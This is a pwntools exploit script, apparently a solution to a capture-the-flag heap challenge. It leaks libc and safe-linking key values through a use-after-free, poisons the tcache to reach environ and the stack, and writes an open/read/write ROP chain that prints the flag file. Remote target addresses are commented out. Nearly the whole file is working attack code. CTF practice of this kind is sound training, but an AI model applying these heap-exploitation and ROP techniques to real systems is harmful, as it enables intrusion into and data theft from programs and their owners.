from pwn import *
# pwntools setup: verbose tube logging while the script is being developed,
# and the architecture that p64()/asm() helpers below will assume.
context.log_level = 'debug'
context.arch = 'amd64'

# Target tube.  Only the local process is active; the remote variants are
# kept as comments so the script can be switched over by hand.
p = process('./pwn')
# p=remote('1.14.71.254',28880)
#p = remote('59.110.24.117',33320)
#io=process("./pwn")
#elf=ELF('./pwn')

# The libc shipped with the challenge; symbol lookups below come from it, and
# every hardcoded offset in this script is tied to this particular build.
libc = ELF('./libc.so.6')
# Thin wrappers over the pwntools tube `p`, so the exploit body stays short.
# Each one simply forwards its arguments to the corresponding tube method.
def rl(a=False):
    """Forward to p.recvline(a)."""
    return p.recvline(a)


def ru(a, b=True):
    """Forward to p.recvuntil(a, b)."""
    return p.recvuntil(a, b)


def rn(x):
    """Forward to p.recvn(x)."""
    return p.recvn(x)


def sn(x):
    """Forward to p.send(x)."""
    return p.send(x)


def sl(x):
    """Forward to p.sendline(x)."""
    return p.sendline(x)


def sa(a, b):
    """Forward to p.sendafter(a, b)."""
    return p.sendafter(a, b)


def sla(a, b):
    """Forward to p.sendlineafter(a, b)."""
    return p.sendlineafter(a, b)


def irt():
    """Hand the tube over to the user (p.interactive())."""
    return p.interactive()


def dbg(text=None):
    """Attach gdb to `p`, optionally with a gdb script.

    NOTE: a later ``def dbg()`` in this file rebinds the name and also
    calls pause(); this version is effectively unused.
    """
    return gdb.attach(p, text)


def lg(s):
    """Log ``<name> --> 0x<value>`` in red for the variable named by *s*.

    The value is looked up with eval(), so *s* must be a literal variable
    name written in this script -- never anything derived from the target's
    output.
    """
    return log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))


def uu32(data):
    """Zero-pad *data* to 4 bytes and unpack it with u32()."""
    padded = data.ljust(4, b'\x00')
    return u32(padded)


def uu64(data):
    """Zero-pad *data* to 8 bytes and unpack it with u64()."""
    padded = data.ljust(8, b'\x00')
    return u64(padded)
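def dbg(text=None):
    """Attach gdb to the target process and block until the user resumes.

    This definition rebinds the ``dbg`` lambda declared earlier in the file
    but previously dropped its ``text`` parameter; it is restored here (with
    the same ``None`` default) so both call forms keep working.

    Args:
        text: optional gdb command script forwarded to gdb.attach().
    """
    gdb.attach(p, text)
    # Hold the script here so the debugger can be inspected before the
    # next interaction with the target.
    pause()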
# Prompt the target prints before every menu selection; the helpers below
# wait for it before sending a choice.
menu = "Choice: "
def add():
    """Select menu option 1 (allocate) once the prompt appears."""
    choice = '1'
    sla(menu, choice)
def show(index):
    """Select menu option 3 (show) and answer the ``Idx:`` prompt with *index*."""
    choice = '3'
    sla(menu, choice)
    sla('Idx:', str(index))
def delete(index):
    """Select menu option 2 (delete) and answer the ``Idx:`` prompt with *index*."""
    choice = '2'
    sla(menu, choice)
    sla('Idx:', str(index))
def edit(index, size, content):
    """Select menu option 4 (edit) and answer its three prompts in order.

    ``Idx:`` and ``Size:`` are answered with a line each; *content* is sent
    raw after ``Content:`` (no trailing newline), so the caller controls the
    exact bytes delivered.
    """
    sla(menu, '4')
    for prompt, value in (('Idx:', index), ('Size:', size)):
        sla(prompt, str(value))
    sa('Content:', content)
# --- main flow -------------------------------------------------------------
# Everything below talks to the tube `p` opened at the top of the file and
# relies on the hardcoded constants matching the bundled ./libc.so.6.
for i in range(10):
    add()
for i in range(9):
    delete(i)
# Send a single 0x01 byte as chunk 7's content, then print chunk 7 and parse
# the leaked value from the bytes up to the first 0x7f.  The subtracted
# constant is specific to this libc build.
edit(7,0x10,'\x01')
show(7)
# NOTE(review): str fill char here and for `key` below, but a bytes fill char
# (b'\x00') at the stack leak further down -- the script mixes Python 2 and
# Python 3 conventions; bytes.ljust() needs a bytes fill char on Python 3.
libc_base=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-0x1e0c01
lg('libc_base')
environ = libc_base + libc.sym['environ']
lg('environ')
edit(7,0x10,'\x00')
show(0)
ru('\n')
# Second leak: the next five bytes after the newline.
key=u64(p.recv(5).ljust(8,'\x00'))
heapbase=key<<12  # NOTE(review): assigned but never used below
lg('key')
# 16-byte payload: the leaked key XORed with `environ`, then 8 zero bytes.
payload1=p64(key^environ)+p64(0)
# edit(6,0x10,payload1)
for i in range(5):
    add()#10-14
edit(1,0x10,payload1)
# dbg()
add()#15
add()#16
show(16)
# show(11)
# Third leak, parsed the same way as libc_base; the 0x138 adjustment is
# again a fixed offset for this target.
stack_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8, b'\x00')) - 0x138
lg('stack_addr')
# edit(6,)
delete(3)
delete(4)
# Same 16-byte layout as payload1, this time with the stack address.
payload2=p64(key^stack_addr)+p64(0)
edit(4,0x10,payload2)
add()#17
add()#18
# Gadget offsets are hardcoded for this libc build; the commented-out
# libc.search() calls are a dynamic alternative that would survive a
# different libc build.
pop_rdi_ret = libc_base + 0x0000000000028a55
#pop_rsi_ret = libc_base + libc.search(asm('pop rsi;ret;')).__next__()
pop_rsi_ret = libc_base + 0x000000000002a4cf
#pop_rdx_ret = libc_base + libc.search(asm('pop rdx;ret;')).__next__()
pop_rdx_ret = 0x00000000000c7f32 + libc_base
read_addr = libc_base + libc.sym['read']
open_addr = libc_base + libc.sym['open']
write_addr = libc_base + libc.sym['write']
# The "./flag" string lands 0x10 bytes into payload3, after the two zero qwords.
flag_addr = stack_addr + 0x10
# payload3: two zero qwords, the NUL-terminated "./flag" string, then the
# three calls described by the inline comments below.
payload3 = p64(0) * 2
payload3 += b'./flag\x00\x00'
# open('./flag', 0)
payload3 += p64(pop_rdi_ret) + p64(flag_addr) + p64(pop_rsi_ret) + p64(0) + p64(open_addr)
# read(3, stack_addr - 0x200, 0x50)
payload3 += p64(pop_rdi_ret) + p64(3) + p64(pop_rsi_ret) + p64(stack_addr - 0x200) + p64(pop_rdx_ret) + p64(0x50) + p64(read_addr)
# write(1, stack_addr - 0x200, 0x50)
payload3 += p64(pop_rdi_ret) + p64(1) + p64(pop_rsi_ret) + p64(stack_addr - 0x200) + p64(pop_rdx_ret) + p64(0x50) + p64(write_addr)
# Blocks here until gdb is attached and pause() returns; comment out for
# unattended runs.
dbg()
# Write payload3 into chunk 18 with an edit size of 0x100.
edit(18,0x100,payload3)
# dbg()
irt()
# Reference link: https://blog.csdn.net/zzq487782568/article/details/125561195